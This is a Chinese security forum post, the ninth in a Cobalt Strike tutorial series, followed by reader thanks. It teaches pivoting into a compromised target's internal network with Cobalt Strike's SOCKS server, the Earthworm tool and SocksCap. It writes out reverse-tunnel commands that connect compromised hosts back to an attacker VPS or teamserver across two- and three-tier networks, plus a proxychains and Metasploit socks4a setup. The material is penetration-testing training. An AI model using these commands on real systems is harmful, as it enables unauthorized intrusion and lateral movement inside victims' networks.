用户
搜索
  • TA的每日心情
    郁闷
    2019-2-10 15:17
  • 签到天数: 40 天

    连续签到: 1 天

    [LV.5]常住居民I

    版主

    QQ547006660~欢迎交流

    Rank: 7Rank: 7Rank: 7

    41

    主题

    126

    帖子

    7223

    魔法币
    收听
    0
    粉丝
    33
    注册时间
    2017-1-18

    秦春秋文阁春秋游侠核心白帽i春秋签约作者幽默灌水王积极活跃奖

    J0o1ey 版主 QQ547006660~欢迎交流 秦 春秋文阁 春秋游侠 核心白帽 i春秋签约作者 幽默灌水王 积极活跃奖 楼主
    发表于 2019-7-28 22:15:17 313415

    0x000-前文

    Cobaltstrike系列教程(一)简介与安装
    https://bbs.ichunqiu.com/thread-52937-1-1.html
    Cobaltstrike系列教程(二)Listner与Payload生成
    https://bbs.ichunqiu.com/thread-52982-1-1.html
    Cobaltstrike系列教程(三)beacon详解
    https://bbs.ichunqiu.com/thread-52994-1-1.html
    Cobaltstrike系列教程(四)菜单栏与视图
    https://bbs.ichunqiu.com/thread-52997-1-1.html
    Cobaltstrike系列教程(五)凭据导出
    https://bbs.ichunqiu.com/thread-53001-1-1.html
    Cobaltstrike系列教程(六)文件/进程管理与键盘记录
    https://bbs.ichunqiu.com/thread-53003-1-1.html
    Cobaltstrike系列教程(七)端口扫描与Net View
    https://bbs.ichunqiu.com/thread-53012-1-1.html
    Cobaltstrike系列教程(八)截图与浏览器代理
    https://bbs.ichunqiu.com/thread-53013-1-1.html

    0x001-Socks概念

    目前利用网络防火墙将组织内部的网络结构与外部网络如 INTERNET 中有效地隔离开来,这种方法正变得逐渐流行起来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET 、 FTP 、 SMTP 等的接入。 SOCKS 提供一个通用框架来使这些协议安全透明地穿过防火墙。
    说的简单明了一点,在渗透测试中,我们使用socks技术,可以穿透进入目标机的内网,从而扩大我们的战果

    0x002-Cobaltstrike自带Socks功能

    选择一个beacon,右键,中转-->SOCKS Server,或使用命令socks [port]
    e1uDv8.png
    弹出一个窗口,按要求配置好代理端口
    e1ua4I.png
    如图,成功开启socks 4,连接我们teamserver的5126端口,即可进入目标机内网~
    e1uUUA.png

    0x003-使用ew+SocksCap穿透到目标机内网

    ①Earthworm(下载见文末)

    Ew(Earthworm)是一款当之无愧的内网穿透大杀器,应用的平台非常广泛,包括

    ew_for_Win.exe        适用各种Windows系统(X86指令集、X64指令集)        Windows7、Windows XP
    ew_for_Linux32        各常见Linux发行版 (X86 指令集 CPU)        Ubuntu(X86)/BT5(X86)
    ew_for_linux64        各常见Linux发行版 (X64 指令集 CPU)        Ubuntu(X64)/Kali(X64)
    ew_for_MacOSX64        MacOS系统发行版 (X64 指令集)        苹果PC电脑,苹果server
    ew_for_Arm32        常见Arm-Linux系统        HTC New One(Arm-Android)/小米路由器(R1D)
    ew_mipsel        常见Mips-Linux系统 (Mipsel指令集 CPU)        萤石硬盘录像机、小米mini路由器(R1CM)

    下面简单讲一下它的应用场景和命令
    e1uwCt.png

    正向socks v5服务器   【适用于目标机拥有一个外网IP】

    服务器端执行以下命令
    ew.exe -s ssocksd -l 888

    说明:服务器开启端口为888,SOCKS的代理。然后使用sockscap64添加这个IP的代理就可以使用了。

    反弹socks v5服务器   【适用于目标机器没有公网IP,但可访问内网资源】

    本地执行以下命令
    ew.exe -s rcsocks -l 1008 -e 888

    说明:该命令的意思是在我们公网VPS上添加一个转接隧道,把1080端口收到的代理请求转交给888端口。

    服务器端执行以下命令
    ew.exe -s rssocks -d 2.2.2.2 -e 888

    说明:该命令的意思是在服务器上启动SOCKS V5服务,并反弹到IP地址为2.2.2.2的服务器888端口上。

    二级网络环境(一)

    假设我们获得了右侧A主机和B主机的控制权
    A主机配有2块网卡,一块连通外网,一块10.48.128.25只能连接内网B主机,无法访问内网其它资源。
    B主机可以访问内网资源,但无法访问外网。

    A.先上传ew到B主机,利用ssocksd方式启动888端口的SOCKS代理,命令如下:
    ew -s ssocksd -l 888

    B.上传ew到右侧A主机,运行下列命令:
    ew -s lcx_tran -l 1080 -f 10.48.128.49 -g 888

    说明:该命令意思是将1080端口收到的代理请求转交给B主机(10.48.128.49)的888端口。

    C.可以通过访问A主机外网139.XXX.XX.113:1080来使用在B主机架设的socks5代理。

    二级网络环境(二)

    假设我们获得了右侧A主机和B主机的控制权限。
    A主机没有公网IP,也无法访问内网资源。B主机可以访问内网资源,但无法访问外网。

    这个操作分为4步,用到lcx_listen和lcx_slave命令:

    A. 先上传ew 到左侧公网VPS上,运行下列命令:
    ew –s lcx_listen –l 10800 –e 888
    说明:该命令意思是在公网VPS添加转接隧道,将10800端口收到的代理请求转交给888端口。

    B.上传ew到B主机,并利用ssocksd方式启动999端口的socks代理,命令如下:
    ew -s ssocksd -l 999

    C.上传ew 到A主机,运行下列命令:
    ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.49 -g 999
    说明:该命令意思是在A主机上利用lcx_slave方式,将公网VPS的888端口和B主机的999端口连接起来。

    D. 返回我们公网VPS的CMD界面下,可以看到已经连接成功了。
    现在就可以通过访问公网VPS地址 139.XXX.XX.113:10800来使用在B主机架设的socks5代理。

    三级网络环境

    三级网络环境在实际渗透中用的比较少,也比较复杂,现在我们来一个个的讲解下三级级联的用法。

    假设渗透场景:
    内网A主机没有公网IP但可以访问外网
    B主机不能访问外网但可以被A主机访问、C主机可被B主机访问而且能够访问核心区域。

    A.在左侧公网VPS上运行命令,将1080端口收到的代理请求转交给888端口:
    ew -s rcsocks -l 1080 -e 888

    B.在A主机上运行命令,将公网VPS的888端口和B主机的999端口连接起来:
    ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.12 -g 999

    C.在B主机上运行命令,将999端口收到的代理请求转交给777端口:
    ew -s lcx_listen -l 999 -e 777

    D.在C主机上启动SOCKS V5服务,并反弹到B主机的777端口上,命令如下。
    ew -s rssocks -d 10.48.128.12 -e 777

    E.在MY PC上可以通过访问公网VPS 139.XXX.XX.113:1080来使用在C主机架设的socks5代理。

    整个数据流向是:SOCKS V5 → 1080 → 888 →999 →777 → rssocks

    实战场景

    本次测试目标机器没有公网IP,但可访问内网资源
    1.我们在teamserver上运行以下命令
    ew.exe -s rcsocks -l 1008 -e 888
    接受888端口数据,然后转发到1008端口
    e1uBgf.png
    2.然后我们在目标机上传ew,然后在cs中执行
    ew.exe -s rssocks -d 2.2.2.2 -e 888(2.2.2.2为teamserver)
    e1u08P.png

    3.随后,我们的teamserver就会显示连接成功
    e1uv26.png

    ②使用SocksCap连接socks

    根据自己的Windows版本以管理员模式运行SocksCap后
    点击代理,然后添加自己teamserver的ip和刚刚转发出来的端口
    e1u6bQ.png

    在这里把代理切换成刚刚添加的
    e1uXP1.png

    右键,添加一个exe文件,根据你的需求,添加要在socks隧道中运行的程序
    e1uxxK.png
    选择程序,右键-->在代理隧道中运行选中程序,该程序即可通过socks进入目标内网
    e1ubVJ.png
    如图,为连入socks通道的cmd ping目标机的某内网ip
    e1KSKO.png

    0x004-在Kali中Metasploit使用socks通道

    1.使用cs搭建好socks4通道后,首先配置神器proxychains
    在/etc/proxychains.conf配置文件中添加新的代理服务器。通过激活动态链设置,确保在不同的代理服务器之间能够正常切换。

    root@kali:~# cat /etc/proxychains.conf | grep -v "#"
    dynamic_chain
    proxy_dns
    tcp_read_time_out 15000
    tcp_connect_time_out 8000
    socks4  172.16.0.20 1080  # socks4通道的IP及端口

    然后在MSF中,配置socks4隧道即可让MSF进入目标机内网大杀四方
    (2.2.2.2为teamserver的ip,1081为socks端口)

    msf exploit(ms08_067_netapi) > use auxiliary/server/socks4a
    msf auxiliary(socks4a) > set SRVHOST 2.2.2.2
    msf auxiliary(socks4a) > set SRVPORT 1081
    SRVPORT => 1081
    msf auxiliary(socks4a) > run
    [*] Auxiliary module execution completed
    [*] Starting the socks4a proxy server
    msf auxiliary(socks4a) >
    

    e1KPVH.png

    0x005-下载

    Socks这块知识可能比较绕,大家如果没整懂,可以联系我交流。
    EW和SocksCap下载链接,回复可见

    e1KprD.png


    游客,如果您要查看本帖隐藏内容请回复

    本帖被以下淘专辑推荐:

    有培训需求或是技术交流需求的朋友可以联系我~QQ547006660交流群820783253
                           內網穿透EW                 
    使用道具 举报 回复
    RE: Cobaltstrike系列教程(九)内置Socks与神器EW [修改]
    使用道具 举报 回复
    RE: Cobaltstrike系列教程(九)内置Socks与神器EW
    danteng得大叔 blog:www.zwert.cn
    使用道具 举报 回复
    Cobaltstrike系列教程(九)内置Socks与神器EW
    使用道具 举报 回复
    66666666666666666666666666666666
    使用道具 举报 回复
    66666666666666666666666666666666
    使用道具 举报 回复
    发表于 2019-8-11 10:51:09

    很好啊  学习学习了
    使用道具 举报 回复
    很好啊  学习学习了
    使用道具 举报 回复
    感谢大佬
    使用道具 举报 回复
    谢谢分享
    使用道具 举报 回复
    发表于 2019-7-30 17:42:39
    好东西,谢谢大佬
    使用道具 举报 回复
    发表于 2019-7-30 21:19:48
    內網穿透EW
    使用道具 举报 回复
    正反代理
    使用道具 举报 回复
    发表于 2019-7-31 22:06:09
    socks还学要学习
    使用道具 举报 回复
    发表于 2019-8-1 15:49:20
    顶顶顶,再讲讲dns的吧?
    使用道具 举报 回复
    66666666666666
    使用道具 举报 回复
    好东西,谢谢大佬
    使用道具 举报 回复
    多谢分享
    使用道具 举报 回复

    谢谢分享
    使用道具 举报 回复
    123下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册